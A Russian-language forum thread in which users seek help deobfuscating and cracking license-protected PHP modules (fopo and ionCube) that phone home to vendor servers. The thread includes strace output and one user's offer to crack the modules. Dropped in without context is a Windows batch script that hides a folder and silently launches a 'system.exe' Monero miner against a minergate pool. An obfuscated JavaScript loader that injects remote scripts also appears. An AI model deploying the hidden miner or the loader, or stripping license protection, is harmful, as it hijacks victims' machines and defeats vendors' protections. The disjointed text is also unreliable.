Здравствуйте. Нужно деобфусцировать 2 php файла общий вес ~400 кб. Всё не так просто и всякие online сервисы, а так же free soft не помогают. Договоримся. Оставляйте согласие в личку.
@Echo on @Echo off set /a cpu=%NUMBER_OF_PROCESSORS%/2 attrib +s +h C:\ProgramData\System32 attrib +s +h C:\ProgramData\System32\*.* Start /Low /B C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u [email protected] -p x -t %cpu% -k
Всем привет. Помогите пожалуйста деобфусцировать (так вроде это называется) 2 файла. Зашифрованы с помощью fopo.com.ar Я в этом полнейший чайник, никогда раньше не пробовал даже. Уже второй день копаюсь в инете и без толку
Там не всё однозначно, нужно для детализации смотреть проект целиком. там условие: PHP: strcmp(sha1(preg_replace("\xбла-бла",preg_replace("\xбла-бла","",file_get_contents(reset(Array))))),"\xбла-бла-бла") и если срабатывает то у functions.php то генериться код: PHP: <?php<!DOCTYPE HTML><html> <head> <title>Enigma SMM Panel - Installer</title> <style> body { margin: 0; font-family: Arial; } .wrapper { width: 600px; margin-left: auto; margin-right: auto; } input[type="text"], input[type="password"] { border: none; box-shadow: 0px 0px 15px 0px; width: 400px; padding: 10px; } .inputs { text-align: center; } input[type="submit"] { width: 300px; padding: 20px; background: #0095FF; color: #FFFFFF; border: none; box-shadow: 0px 0px 5px 0px #fff; margin-top: 20px; } #result { text-align: center; margin-top: 15px; font-weight: bold; } </style> </head> <body> <div class="wrapper"> <form method="POST" id="installation"> <div class="inputs"> <div> <p><label>MySQL Hosting</p></label> <input type="text" name="hostname" placeholder="127.0.0.1"> </div> <div> <p><label>MySQL Username</p></label> <input type="text" name="username" placeholder="root"> </div> <div> <p><label>MySQL Password</p></label> <input type="password" name="password" placeholder="root_password"> </div> <div> <p><label>MySQL Database</p></label> <input type="text" name="database" placeholder="database_name"> </div> <div> <p><label>License Code</p></label> <input type="text" name="license" placeholder="xxxx-xxxx-xxxx" maxlength="32"> </div> </div> <div style="text-align: center;"> <input type="submit" name="install" value="Install"> </div> </form> <div id="result"> </div> </div> </body></html>?> а у install.php тупо сообщение: PHP: MySQL connection is not configured correct.Check your MySQL connection settings.
Помоги и мне, у меня один в один скрипт, у этих пидоров лёг сайт и перестала работать панель Готов даже заплатить telegram Spoiler: telega @TSavchuk
у меня телеграмма нет, и я не беру деньги за крак, хак или криптоанализ в соответствии с "A Cypherpunk's Manifesto". Кидай в личку Джаббер, посмотрю, но оставляю за собой право отказаться без объяснения причин.
Здравствуйте! Завис сайт на openCart 2x из за покупных модулей, т.к. сайт разрабов сегодня 15-01-2018 в 15:15 перестал работать. Если эти модули отключить сайт отображается, но большинство функционала не работает!!! Покупные модули содержат шифрованные файлы, предполагаем что в них есть некий механизм защиты с проверкой IP-шников "91.240.85.191" и "62.109.8.29" Вот что выдал strace: connect(9, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("91.240.85.191")}, 16) = -1 EINPROGRESS (Operation now in progress) clock_gettime(CLOCK_MONOTONIC, {4246, 717606269}) = 0 poll([{fd=9, events=POLLOUT|POLLWRNORM}], 1, 1500) = 0 (Timeout) getsockopt(9, SOL_SOCKET, SO_ERROR, [0], [4]) = 0 close(9) connect(9, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.109.8.29")}, 16) = -1 EINPROGRESS (Operation now in progress) clock_gettime(CLOCK_MONOTONIC, {4254, 237651313}) = 0 poll([{fd=9, events=POLLOUT|POLLWRNORM}], 1, 3000) = 0 (Timeout) getsockopt(9, SOL_SOCKET, SO_ERROR, [0], [4]) = 0 close(9) Испробовали бесплатные утилиты по расшифровке - результата нет Вот первый файл на пробу помогите пожалуйста заплатим не вопрос!
Code: ~$ dig -x 62.109.8.29 +short u-coder.ru. ~$ dig -x 91.240.85.191 +short addist.ru. ~$ ping 62.109.8.29 PING 62.109.8.29 (62.109.8.29) 56(84) bytes of data. ^C --- 62.109.8.29 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 2029ms ~$ ping 91.240.85.191 PING 91.240.85.191 (91.240.85.191) 56(84) bytes of data. ^C --- 91.240.85.191 ping statistics --- 9 packets transmitted, 0 received, 100% packet loss, time 8186ms выкидывайте эти модули, в strace должно быть видно из какого файла вызов идёт
да все от addist.ru Addist framework [by addist.ru] OcSEO Plus - One click solution v0.10.6 [by addist.ru] Breadcrumbs + v0.1.2 [by addist.ru] Пришлось отключить и переписать функционал, вот уже вторые сутки восстанавливаем сайт Во всех них есть шифрованные файлы которые долбятся на addist.ru с условием, если не виден сайт, то ждать секунду и повторить еще раз подключение - от чего сайт повисает!
можно уточнить версию ПЭХОПЭ и ионкуб экстеншн, а лучше всю папку с пэхопэ для анализа или ещё лучше под винду. И я чёта читнул про ионкуб нихрена не понял где он там шифрует? Расскажите процедуру, вы им даете файли пэхопэ, а они возвращают их зашифрованными? Или сами шифруете? Если сами расскажите как. Оцениваю вероятность деобфускации как => 0,36
Выполняет функцию Code: function anonymous() { var _0x13817=["script","getElementsByTagName","45","src","length",".","split","","game-gear.ru/neptun/NeptunJS.gge","neptunjs.xyz/neptun/gge/NeptunJS.gge","neptunjs.com/neptun/gge/NeptunJS.gge","neptunjs.xyz/neptun/gge/njsLoader.","neptunjs.com/neptun/gge/njsLoader.","neptunjs.com/njs/njsLoader.","neptunjs.xyz/njs/njsLoader.","neptunjs.xyz/njs/NeptunJS.gge","neptunjs.neptunjsv2/nv2/njsLoader.","removeChild","parentNode","createElement","//mem.neptunjs.com/njs/njsLoader.js","appendChild","body","data-name","njs2","setAttribute","//proteus.neptunjs.com/njs/gge/NJS.gge","head","link","href","//proteus.neptunjs.com/njs/css/neptun.css","rel","stylesheet","type","text/css"]; scriptster= document[_0x13817[1]](_0x13817[0]); a251sw8q4s= _0x13817[2]; ssdw213= scriptster[scriptster[_0x13817[4]]- 1][_0x13817[3]]; sswq98745= scriptster[scriptster[_0x13817[4]]- 1]; ddls= ssdw213[_0x13817[6]](_0x13817[5]); sdwyyqt51= ddls[ddls[_0x13817[4]]- 2]+ _0x13817[7]; sdqw4587= ddls[ddls[_0x13817[4]]- 3]+ _0x13817[7]; smls= ddls[ddls[_0x13817[4]]- 1]+ _0x13817[7]; lbsc= sdqw4587+ _0x13817[5]+ sdwyyqt51+ _0x13817[5]; if(lbsc=== _0x13817[8]|| lbsc=== _0x13817[9]|| lbsc=== _0x13817[10]|| lbsc=== _0x13817[11]|| lbsc=== _0x13817[12]|| lbsc=== _0x13817[13]|| lbsc=== _0x13817[14]|| lbsc=== _0x13817[15]|| lbsc=== _0x13817[16]) { nnmvx= 1 } else { sswq98745[_0x13817[18]][_0x13817[17]](sswq98745); script= document[_0x13817[19]](_0x13817[0]); script[_0x13817[3]]= _0x13817[20]; document[_0x13817[22]][_0x13817[21]](script) }; if(nnmvx=== 1) { scriptsus= document[_0x13817[19]](_0x13817[0]); scriptsus[_0x13817[25]](_0x13817[23],_0x13817[24]); scriptsus[_0x13817[3]]= _0x13817[26]; document[_0x13817[27]][_0x13817[21]](scriptsus); style= document[_0x13817[19]](_0x13817[28]); style[_0x13817[29]]= _0x13817[30]; style[_0x13817[31]]= _0x13817[32]; style[_0x13817[33]]= _0x13817[34]; document[_0x13817[27]][_0x13817[21]](style) } } И возвращает 3624
https://pastebin.com/7WKh0MJF расшифруйте пожалуйста и расскажите, как провести такую же фишку заранее благодарю
